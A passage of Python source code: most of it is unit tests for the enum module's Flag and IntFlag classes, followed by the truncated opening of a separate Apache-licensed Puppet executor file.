self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programmatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
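# with __eq__ overridden to identity, a duplicate composite member created by a racing thread would appear as an extra element of seen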
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
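# IntFlag members are also ints: they compare equal to their value, and bitwise operations with plain integers stay within the flag type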
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programmatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that no duplicate members were created (8 canonical + 248 composite = 256 values)
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexicographical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
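# Editor's sketch (not part of the original test suite): a minimal illustration
# of the IntFlag behaviour exercised by the tests above -- members combine with
# |, &, ^ and ~, and the results remain members of the flag class.
def _intflag_demo():
    class Perm(IntFlag):
        R = 4
        W = 2
        X = 1
    RW = Perm.R | Perm.W
    assert isinstance(RW, Perm) and RW.value == 6
    assert RW & Perm.W is Perm.W
    assert Perm.R ^ Perm.R == Perm(0)
    return RW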
|
PuppetExecutor.py
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import os.path
import logging
import subprocess
import pprint
import threading
from threading import Thread
from manifestGenerator import generateManifest
from RepoInstaller import RepoInstaller
from Grep import Grep
import shell
logger = logging.getLogger()
class PuppetExecutor:
""" Class that executes the commands that come from the server using puppet.
This is the class that provides the pluggable point for executing the puppet"""
# How many seconds will pass before running puppet is terminated on timeout
PUPPET_TIMEOUT_SECONDS = 600
grep = Grep()
event = threading.Event()
last_puppet_has_been_killed = False
NO_ERROR = "none"
def __init__(self, puppetModule, puppetInstall, facterInstall, tmpDir, config):
self.puppetModule = puppetModule
self.puppetInstall = puppetInstall
self.facterInstall = facterInstall
self.tmpDir = tmpDir
self.reposInstalled = False
self.config = config
self.modulesdir = self.puppetModule + "/modules"
def configureEnviron(self, environ):
if not self.config.has_option("puppet", "ruby_home"):
return environ
ruby_home = self.config.get("puppet", "ruby_home")
if os.path.exists(ruby_home):
"""Only update ruby home if the config is configured"""
path = os.environ["PATH"]
if not ruby_home in path:
environ["PATH"] = ruby_home + os.path.sep + "bin" + ":"+environ["PATH"]
environ["MY_RUBY_HOME"] = ruby_home
return environ
def getPuppetBinary(self):
puppetbin = os.path.join(self.puppetInstall, "bin", "puppet")
if os.path.exists(puppetbin):
return puppetbin
else:
logger.info("Using default puppet on the host : " + puppetbin
+ " does not exist.")
return "puppet"
def discardInstalledRepos(self):
"""
Makes the agent forget about installed repos,
so the next call to generate_repo_manifests() will
install the repos again.
"""
